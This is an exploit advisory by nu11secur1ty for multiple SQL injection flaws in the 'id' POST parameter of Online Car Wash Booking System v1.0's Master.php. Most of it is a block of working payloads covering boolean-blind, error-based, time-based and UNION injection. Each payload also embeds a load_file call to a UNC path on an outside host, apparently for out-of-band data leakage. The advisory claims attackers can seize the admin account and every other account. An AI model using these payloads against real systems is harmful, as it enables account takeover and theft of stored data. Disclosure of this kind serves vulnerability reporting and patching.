## Title: Online Car Wash Booking System v1.0 Multiple SQLi
## Author: nu11secur1ty
## Date: 04.14.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Car-Wash-Booking

## Description:
The `id` parameter from `Master.php` app appears to be vulnerable to
multiple SQL injection attacks.
The attacker can take administrator account control and also of all
accounts on this system, also the malicious user can download all
information about this system.

Status: CRITICAL

[+] Payloads:

```mysql

---
Parameter: id (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: id=2'+(select
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''
OR NOT 6009=6009-- JZLD

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: id=2'+(select
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''
OR (SELECT 6485 FROM(SELECT COUNT(*),CONCAT(0x7178767871,(SELECT
(ELT(6485=6485,1))),0x7178627871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pulo

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2'+(select
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''
AND (SELECT 4435 FROM (SELECT(SLEEP(5)))atck)-- TPWe

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=2'+(select
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''
UNION ALL SELECT
NULL,CONCAT(0x7178767871,0x685a6a63457747786c695058795575724b664e564a5764425a61614f776b48765949654350547a73,0x7178627871),NULL--
-
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Car-Wash-Booking)

## Proof and Exploit:
[href](https://streamable.com/w4t6rk)